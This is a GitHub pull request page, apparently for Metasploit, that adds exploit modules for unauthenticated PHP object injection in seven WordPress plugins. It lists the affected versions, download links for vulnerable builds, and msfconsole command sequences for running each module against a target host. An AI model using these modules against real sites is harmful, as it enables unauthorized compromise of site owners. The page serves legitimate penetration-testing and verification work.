Add exploit modules for multiple PHP object injection vulnerabilities in various WordPress plugins #8006
+1,004
−0
Conversation
8 commits
Nov 8, 2016
and others
added This module exploits multiple PHP object injection vulnerabilities affecting various WordPress plugins. Targets WordPress 3.4 - 4.x (tested on WordPress 4.5.3 - 4.7.2)
Fix formatting warnings
Removed nBill Lite reference, fixed indices
I think this module needs to be broken down into separate modules. |
@wchen-r7 split in separate modules :) |
FYI, the POP chain still works in WordPress 4.7.4, which was released yesterday |
...exploits/multi/http/wp_analytics_stats_counter_statistics_unserialize.rb
Outdated
Show resolved
Hide resolved
Hello @ykoster, I'm sorry we have left this sitting for so long. I am closing this PR for now as part of an initiative to have our queue reflect PRs currently being developed, and I have added the |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
These modules exploit multiple unauthenticated PHP object injection vulnerabilities in various WordPress plugins. Targets WordPress 3.4 - 4.x (tested on WordPress 4.5.3 - 4.7.2).
Affected plugins
Google Forms < 0.91
Ecwid Ecommerce Shopping Cart < 4.4.4
CMS Commander Client < 2.22
InfiniteWP Client < 1.6.1.1
Analytics Stats Counter Statistics (not fixed)
YITH WooCommerce Compare < 2.1.0
Google Analytics Counter Tracker < 3.5.1
Verification
Make sure you're running a WordPress site with one of the affected plugins installed & actived.
Google Forms < 0.91
https://sumofpwn.nl/download/wpgform.0.84.zip
msfconsole
use exploit/multi/http/wp_google_forms_unserialize
set RHOST <ip target site>
set TARGETURI <WordPress path>
set LHOST <ip of FTP service>
RPORT
,SSL
, andVHOST
exploit
Ecwid Ecommerce Shopping Cart < 4.4.4
Requires (free) registation & activation @ Ecwid
https://sumofpwn.nl/download/ecwid-shopping-cart.4.4.zip
msfconsole
use exploit/multi/http/wp_ecwid_shopping_cart_unserialize
set RHOST <ip target site>
set TARGETURI <WordPress path>
set LHOST <ip of FTP service>
RPORT
,SSL
, andVHOST
exploit
CMS Commander Client < 2.22
https://sumofpwn.nl/download/cms-commander-client.2.21.zip
msfconsole
use exploit/multi/http/wp_cms_commander_client_unserialize
set RHOST <ip target site>
set TARGETURI <WordPress path>
set LHOST <ip of FTP service>
RPORT
,SSL
, andVHOST
exploit
InfiniteWP Client < 1.6.1.1
https://sumofpwn.nl/download/iwp-client.zip
msfconsole
use exploit/multi/http/wp_infinitewp_client_unserialize
set RHOST <ip target site>
set TARGETURI <WordPress path>
set LHOST <ip of FTP service>
RPORT
,SSL
, andVHOST
exploit
Analytics Stats Counter Statistics
https://sumofpwn.nl/download/stats-counter.zip
msfconsole
use exploit/multi/http/wp_analytics_stats_counter_statistics_unserialize
set RHOST <ip target site>
set TARGETURI <WordPress path>
set LHOST <ip of FTP service>
RPORT
,SSL
, andVHOST
exploit
YITH WooCommerce Compare < 2.1.0
Requires WooCommerce
https://sumofpwn.nl/download/yith-woocommerce-compare.2.0.9.zip
https://sumofpwn.nl/download/woocommerce.2.6.1.zip
msfconsole
use exploit/multi/http/wp_yith_woocommerce_compare_unserialize
set RHOST <ip target site>
set TARGETURI <WordPress path>
set LHOST <ip of FTP service>
RPORT
,SSL
, andVHOST
exploit
Google Analytics Counter Tracker < 3.5.1
https://sumofpwn.nl/download/analytics-counter.zip
msfconsole
use exploit/multi/http/wp_google_analytics_counter_tracker_unserialize
set RHOST <ip target site>
set TARGETURI <WordPress path>
set LHOST <ip of FTP service>
RPORT
,SSL
, andVHOST
exploit